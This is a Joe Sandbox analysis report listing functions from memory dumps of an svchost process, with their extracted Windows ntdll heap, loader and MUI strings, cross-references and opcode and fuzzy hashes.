String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: fb8a0e1a14073fb699d5422603a19c2e3c18917ee05f5d479889c12c019d8e92
Instruction ID: 9c1dcaf8339107a60d5b40647001457c6fad14680c4c91e96c32b65381df4f12
Opcode Fuzzy Hash: fb8a0e1a14073fb699d5422603a19c2e3c18917ee05f5d479889c12c019d8e92
Instruction Fuzzy Hash: 0FD1BF71A00655DFDF22DF68C850AA9BBF2FF4A784F08805DE646AB251CBB4D945CF10

Function 02F2D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON

Download Yara Rule

Strings

@, xrefs: 02F2D313
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 02F2D0CF
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 02F2D146
@, xrefs: 02F2D2AF
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 02F2D2C3
@, xrefs: 02F2D0FD
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 02F2D262
Control Panel\Desktop\LanguageConfiguration, xrefs: 02F2D196

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: 4c0f6a955b57945fb414cde1a61385c430fdbdd770a6da6e60d98f36936ff3e9
Instruction ID: d4b18d549a6f775ccd11c0d9a317cca3005605f8ea3f44d588e91586b652ba5f
Opcode Fuzzy Hash: 4c0f6a955b57945fb414cde1a61385c430fdbdd770a6da6e60d98f36936ff3e9
Instruction Fuzzy Hash: DEA15D719083559FE721DF24C884B5BB7E9FB89799F00492EEB8896280D774D908CF92

Function 02F3ADE0 Relevance: 9.3, Strings: 7, Instructions: 573COMMON

Download Yara Rule

Strings

MZER, xrefs: 02F936A8
H, xrefs: 02F3AEC2
LdrpResSearchResourceMappedFile Enter, xrefs: 02F3AEB8
#, xrefs: 02F9363D
MUI, xrefs: 02F3B410
LdrpResSearchResourceMappedFile Exit, xrefs: 02F3AECC
J, xrefs: 02F3AEAE

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
API String ID: 0-664215390
Opcode ID: 1a90667cc5e76aaecbf0adde0cdd1f48888714d96c4ecf9089573cadbe57c972
Instruction ID: 5f9b96c315cb342d09b40ed4d82ff8bbd5a7329bb7a8097c9186e307648bc693
Opcode Fuzzy Hash: 1a90667cc5e76aaecbf0adde0cdd1f48888714d96c4ecf9089573cadbe57c972
Instruction Fuzzy Hash: 7A328171E042698BEF22CB15CCA4BEEB7B5BF45388F1441E6DA49A7250D7719E81CF40

Function 02F49EB0 Relevance: 9.2, Strings: 7, Instructions: 499COMMON

Download Yara Rule

Strings

sxsisol_SearchActCtxForDllName, xrefs: 02F976DD
minkernel\ntdll\sxsisol.cpp, xrefs: 02F97713, 02F978A4
!(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 02F97709
[%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 02F976EE
@, xrefs: 02F49EE7
Status != STATUS_NOT_FOUND, xrefs: 02F9789A
Internal error check failed, xrefs: 02F97718, 02F978A9

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
API String ID: 0-761764676
Opcode ID: ec2c8117525b427300ea3a31a2b8e930e9016636f0ce65e563f48f0eeda1de3d
Instruction ID: 20818c530dd00edf40f1b31dc5bc9868920b0a9484d1b76485c1f0b2a349286d
Opcode Fuzzy Hash: ec2c8117525b427300ea3a31a2b8e930e9016636f0ce65e563f48f0eeda1de3d
Instruction Fuzzy Hash: 92129F71E002188BEF14DF58C880BBEB7B5FF48794F14816AEA49EB241E7759841CB65

Function 02F3EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

R, xrefs: 02F3EB62
LdrpResSearchResourceInsideDirectory Exit, xrefs: 02F3EB6C
T, xrefs: 02F3EB4E
LdrpResSearchResourceInsideDirectory Enter, xrefs: 02F3EB58
{, xrefs: 02F94643
, xrefs: 02F3F299

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 274417ee8c6ca500c8d44e3582f8e13aeceb04aceb9680c0b17a752b2a1f0124
Instruction ID: ca4de77d6e161e60e162fdd5a56fad0334255c6848f033194d98c2abe1859ea6
Opcode Fuzzy Hash: 274417ee8c6ca500c8d44e3582f8e13aeceb04aceb9680c0b17a752b2a1f0124
Instruction Fuzzy Hash: 03A24975E056298FEF65DF19CD88BA9B7B1AF55384F1042E9DA0DA7290DB309E81CF00

Function 02F2F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

(!TrailingUCR), xrefs: 02F8E3A9
HEAP: , xrefs: 02F8DF64, 02F8E0A8, 02F8E286, 02F8E39E
(LONG)FreeEntry->Size > 1, xrefs: 02F8E291
HEAP[%wZ]: , xrefs: 02F8DF57, 02F8E09B, 02F8E279, 02F8E391
((LONG)FreeEntry->Size > 1), xrefs: 02F8E0B3
(UCRBlock != NULL), xrefs: 02F8DF6F

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: c6ee9e2a0c9c2a4194dfd2ab389b89e466de84897c29f996a511cf7cd5eaf9aa
Instruction ID: 95170a41742882707e7eb9b4af44c3d29c381c5cb8239f5dbb1edb190af801f4
Opcode Fuzzy Hash: c6ee9e2a0c9c2a4194dfd2ab389b89e466de84897c29f996a511cf7cd5eaf9aa
Instruction Fuzzy Hash: 7842F1316143418FD715DF28C980B2ABBE5FF86388F14466DFA868B791DB34D849CB52

Function 02F4B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 02F984D0
minkernel\ntdll\ldrutil.c, xrefs: 02F9840D, 02F984E1
LdrpPreprocessDllName, xrefs: 02F98403, 02F984D7
SxS, xrefs: 02F983ED
DLL %wZ was redirected to %wZ by %s, xrefs: 02F983FC
API set, xrefs: 02F983F4, 02F983F9

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: b4122c37c9866cfc5df979bc5b1dd553829c0686879c3e4ea25b7dbe351407d7
Instruction ID: 3a6ce8d51d1e40ea2638e6a36bb5ad3a9c5b73a7372f9b8f62345a187a8ce99a
Opcode Fuzzy Hash: b4122c37c9866cfc5df979bc5b1dd553829c0686879c3e4ea25b7dbe351407d7
Instruction Fuzzy Hash: FCC11731F002159BEF259F69CC80B7EBB65AF467CCF144069EB069B292DBB4D944C790

Function 00402660 Relevance: 7.8, Strings: 6, Instructions: 332COMMON

Download Yara Rule

Strings

T, xrefs: 0040267E
yxxx, xrefs: 00402881
VUUU, xrefs: 004029C3
R, xrefs: 00402921
r., xrefs: 00402699
VUUU, xrefs: 004026E1

Memory Dump Source

Source File: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: T$R$VUUU$VUUU$r.$yxxx
API String ID: 0-2866472309
Opcode ID: 4f7e2e5172a3b844b30fe423b7f63fb6e4d6cb2265bc1c1b21104bfa07f6fdf9
Instruction ID: 450f25ddbbda6c250bcf28258f734591414a95407337f0af3c9396c7978ced38
Opcode Fuzzy Hash: 4f7e2e5172a3b844b30fe423b7f63fb6e4d6cb2265bc1c1b21104bfa07f6fdf9
Instruction Fuzzy Hash: 0FB1B575F005094BDF1CCA59CA582AEB6A2EBD4305F28823FD906EF3D1E6799D058B84

Function 02F663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 02FA40E9, 02FA414B, 02FA420F, 02FA4269
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 02FA41FE
_LdrpInitialize, xrefs: 02FA40DF, 02FA4141, 02FA4205, 02FA425F
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 02FA40D8
Process initialization failed with status 0x%08lx, xrefs: 02FA413A
Delaying execution failed with status 0x%08lx, xrefs: 02FA4258

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 9c7dd895f3a8df88c30b38dc20d641b27faa072ad062495ec57fc1ecbfa220d9
Instruction ID: 8993fe33bc3279fb3125af736c6877fc23410cfbf15b4951d61e4aa521628c74
Opcode Fuzzy Hash: 9c7dd895f3a8df88c30b38dc20d641b27faa072ad062495ec57fc1ecbfa220d9
Instruction Fuzzy Hash: 77914771F013149BEB35EF54DD58BBA7BA5EF41BD8F100169EB01ABA84D7B89801CB90

Function 02F6C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 02FA8181, 02FA81F5
minkernel\ntdll\ldrinit.c, xrefs: 02F6C6C3
Loading import redirection DLL: '%wZ', xrefs: 02FA8170
Unable to build import redirection Table, Status = 0x%x, xrefs: 02FA81E5
LdrpInitializeImportRedirection, xrefs: 02FA8177, 02FA81EB
LdrpInitializeProcess, xrefs: 02F6C6C4

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 2a2648b6072d34db08f862e1d07ccf8b1922c07cb772a3cd96acedfbae9d1507
Instruction ID: 166404205d37d4f4795aba0a7963bcab060b13c2dfdeb999ff238fab743486b6
Opcode Fuzzy Hash: 2a2648b6072d34db08f862e1d07ccf8b1922c07cb772a3cd96acedfbae9d1507
Instruction Fuzzy Hash: 913108B17443519BD220EF28DD45E2BB795EF84B94F000568FB856B291D664EC04CFA2

Function 02F62674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 02FA21BF
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 02FA2178
RtlGetAssemblyStorageRoot, xrefs: 02FA2160, 02FA219A, 02FA21BA
SXS: %s() passed the empty activation context, xrefs: 02FA2165
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 02FA2180
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 02FA219F

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 9b4b5064ecf10eed8553c7eadddded681dedfab630de025d50dfff5ba9dcb52d
Instruction ID: 2189ce5a62521e3ff2934dcb34a57e4a5a856c7afa3ba7086befef2fdf2706b5
Opcode Fuzzy Hash: 9b4b5064ecf10eed8553c7eadddded681dedfab630de025d50dfff5ba9dcb52d
Instruction Fuzzy Hash: FD31D276F40214A7F7219A998C95F6AB769DF94AD4F054069BF09A7140D370DE00C6E1

Function 02FB9C32 Relevance: 6.8, Strings: 5, Instructions: 542COMMON

Download Yara Rule

Strings

AVRF: Verifier .dlls must not have thread locals, xrefs: 02FBA12D
@, xrefs: 02FB9E80
KnownDllPath, xrefs: 02FB9CF9
\KnownDlls32, xrefs: 02FB9C67
L, xrefs: 02FBA2FB

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
API String ID: 0-3127649145
Opcode ID: 720a2fbe1d329ee837ce69fedb4633879bf59d4a2937096432e18878fd86417f
Instruction ID: a33f8116145d86b59acaa6d380e7773724f40b0126a1fd858e6bd555cbe262f6
Opcode Fuzzy Hash: 720a2fbe1d329ee837ce69fedb4633879bf59d4a2937096432e18878fd86417f
Instruction Fuzzy Hash: 04324971A017199BDB22DF25CD88BDAB7F9FF48344F1041EAD609A7250DB71AA84CF50

Function 02F49950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON

Download Yara Rule

Strings

, xrefs: 02F499F9
Status != STATUS_SXS_SECTION_NOT_FOUND, xrefs: 02F976A3
minkernel\ntdll\sxsisol.cpp, xrefs: 02F976AD
, xrefs: 02F499F1
Internal error check failed, xrefs: 02F976B2

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
API String ID: 0-3393094623
Opcode ID: 69f5095456cd15b8ffd426f91b2fff6b38fa1089047989f5a05f3ce7045b6434
Instruction ID: e8869287b65eb2ef888f6717114966d49b2095f02cdd24c409bc1c9facb7cedc
Opcode Fuzzy Hash: 69f5095456cd15b8ffd426f91b2fff6b38fa1089047989f5a05f3ce7045b6434
Instruction Fuzzy Hash: 1A025B71A08341CFD720DF64C584B6BBBE5BF84788F44491EEA9997250EBF0D944CBA2

Function 02F551EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

Kernel-MUI-Language-SKU, xrefs: 02F5542B
Kernel-MUI-Language-Disallowed, xrefs: 02F55352
WindowsExcludedProcs, xrefs: 02F5522A
Kernel-MUI-Language-Allowed, xrefs: 02F5527B
Kernel-MUI-Number-Allowed, xrefs: 02F55247

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 6f04a83137a79b3bb6a70795adebaa303df32ca63c9fcdf9b77592f41e5a6da2
Instruction ID: 46f65e18556bbcad2e90f21d2caaf7c5f11ec495b51d48fb2c03cc06da3e921f
Opcode Fuzzy Hash: 6f04a83137a79b3bb6a70795adebaa303df32ca63c9fcdf9b77592f41e5a6da2
Instruction Fuzzy Hash: 43F13B72D10229EBDF15DF94D980A9EBBB9FF48794F55005AEB01A7250DB709E01CF90

Function 02FB4F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON

Download Yara Rule

Strings

\, xrefs: 02FB4F66
.Local, xrefs: 02FB5170
.DLL, xrefs: 02FB50C7, 02FB519C
/, xrefs: 02FB4F6D
\microsoft.system.package.metadata\Application, xrefs: 02FB5158

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
API String ID: 0-2518169356
Opcode ID: f7dbaa4c2fcae3783484215302202caf4e32ad3c6670110171b200356171794f
Instruction ID: e908f4c794fd0df98f6b71ac3688ebf09b199d40f349e3afa1661982608b68d1
Opcode Fuzzy Hash: f7dbaa4c2fcae3783484215302202caf4e32ad3c6670110171b200356171794f
Instruction Fuzzy Hash: 1891C572E0061ADBCB22CF59C880AEEB7B1FF48794F994169EA11E7350D779D901CB90

Function 02F5D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON

Download Yara Rule

Strings

LdrShutdownProcess, xrefs: 02F9F2CE
minkernel\ntdll\ldrinit.c, xrefs: 02F9F2D8
$, xrefs: 02F5D86D
Process 0x%p (%wZ) exiting, xrefs: 02F9F2C7
$, xrefs: 02F5D900

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 0-1975516107
Opcode ID: d534458abac24937a76b9cdfd864068668d17611aedc8f16952ccc3ea26e64ec
Instruction ID: eacb7a05a0121d7e499d10ce715cc889093a8c6cf4428299d87afef115d8a80d
Opcode Fuzzy Hash: d534458abac24937a76b9cdfd864068668d17611aedc8f16952ccc3ea26e64ec
Instruction Fuzzy Hash: C151F371E023559FDB24EFA4C884B9DBBB2BF45798F244159DF016B285D778A881CF80

Function 02F276B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 02F8B023
HEAP[%wZ]: , xrefs: 02F8B016
Invalid heap signature for heap at %p, xrefs: 02F8B02F
RtlFreeHeap, xrefs: 02F8B03F
, passed to %s, xrefs: 02F8B040

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
API String ID: 0-3061284088
Opcode ID: 341383ba05a020c2ebd159caf31e16b353d8300f9bb8a2a5638c4b99ce5fbbba
Instruction ID: 430611584313a0824409ecb3309136f76d399b1d9980419c415befe6864ed045
Opcode Fuzzy Hash: 341383ba05a020c2ebd159caf31e16b353d8300f9bb8a2a5638c4b99ce5fbbba
Instruction Fuzzy Hash: 25014C322052A0DEF325B318D859F56FBD4EB43FF8F244049E61197591CBE8EC88DA21

Function 02F470C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 02F47C7C, 02F4867F
HEAP[%wZ]: , xrefs: 02F47C6D, 02F48670
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 02F47C96, 02F48696

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: eb95f6172bc99b7c36264c3a131c97dea1c7ed00dc6ecc63e947b47143b0f5dd
Instruction ID: 30e3f5552995a78c4b75f2f0d8b889f01540999a52f95e2d35b909255e66f5df
Opcode Fuzzy Hash: eb95f6172bc99b7c36264c3a131c97dea1c7ed00dc6ecc63e947b47143b0f5dd
Instruction Fuzzy Hash: D113AF70E00655CFDB24DF68C890BA9FBF1BF49384F1481A9DA45AB381DBB4A945CF90

Function 02F41070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 02F95884
HEAP[%wZ]: , xrefs: 02F95877
!(CheckedFlags & ~HEAP_CREATE_VALID_MASK), xrefs: 02F9588F
@, xrefs: 02F95A53

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
API String ID: 0-3570731704
Opcode ID: 0fc7c419fc2275868e7550f7395d28672a20f32ce1b360c5fa297cbd678e9afe
Instruction ID: c1f9235e570ef55a778a7e9fe31b9e5b5b7560e2360a641b6f17e76fb1da1bf7
Opcode Fuzzy Hash: 0fc7c419fc2275868e7550f7395d28672a20f32ce1b360c5fa297cbd678e9afe
Instruction Fuzzy Hash: A3923A71E01228CFEB25CF14CC40BAABBB6AF45394F1581EADA4DA7250DB749E84CF51

Function 02F4A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON

Download Yara Rule

Strings

SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 02F97D39
SsHd, xrefs: 02F4A885
SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 02F97D56
RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 02F97D03

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
API String ID: 0-2905229100
Opcode ID: 7dfa46363aad3c70efe23e5aa9a1d017d7fdb1feada0a341d262db45cb8f9b7f
Instruction ID: c6f3d3dd87238f1fe8de0da8fae54049368f7d1df93fb51d40d42114dc4b8c73
Opcode Fuzzy Hash: 7dfa46363aad3c70efe23e5aa9a1d017d7fdb1feada0a341d262db45cb8f9b7f
Instruction Fuzzy Hash: 89D1B072E40219DBDF24DF98C8E0AADBBB5FF48354F15406AEA05AB341DBB19841CB90

Function 02F43D40 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 02F4437C, 02F445B4, 02F44853
HEAP[%wZ]: , xrefs: 02F4436D, 02F445A5, 02F44844
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 02F44393, 02F445CB, 02F4486D

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 714bde0cf8ac2388a0511cf8a82cd1c27fe63e19d588559bf60233347a7604c9
Instruction ID: 9c04440ace303fb68c8bbcf5c8d5b7e5b348ce189be79ecc10b5633ac317b23c
Opcode Fuzzy Hash: 714bde0cf8ac2388a0511cf8a82cd1c27fe63e19d588559bf60233347a7604c9
Instruction Fuzzy Hash: D4E2A070E002558FDB29CF68C890BA9BBF1FF49744F148199DA49AB385DBB4A845CF90

Function 02F3A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

6, xrefs: 02F3A3F7
LdrResFallbackLangList Enter, xrefs: 02F3A3EF
8, xrefs: 02F3A3E7
LdrResFallbackLangList Exit, xrefs: 02F3A3FF

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 725f774b71451e191cf1ed864de285ffec4f866189c09353c59969a79c353560
Instruction ID: 0ba26da1d9e1590cafd739acd38a6d616778be7249e3426970cb8578608fd3f0
Opcode Fuzzy Hash: 725f774b71451e191cf1ed864de285ffec4f866189c09353c59969a79c353560
Instruction Fuzzy Hash: 57C1AC72608382DFD712CF1AC544B6AB7E4BF84798F00496AFAD68B350E734C949CB52

Function 02F40C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON

Download Yara Rule

Strings

ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 02F955AE
HEAP: , xrefs: 02F954E0, 02F955A1
((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 02F954ED
HEAP[%wZ]: , xrefs: 02F954D1, 02F95592

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: edd6b56cfdd982630ec836ebae12e5fc10a85db4c77c92fb69c3527a6fff09ac
Instruction ID: 4793b0507b6d2f537f8c15724cd4b92ca14a292c8ab35c1685d44df5fd0e3bff
Opcode Fuzzy Hash: edd6b56cfdd982630ec836ebae12e5fc10a85db4c77c92fb69c3527a6fff09ac
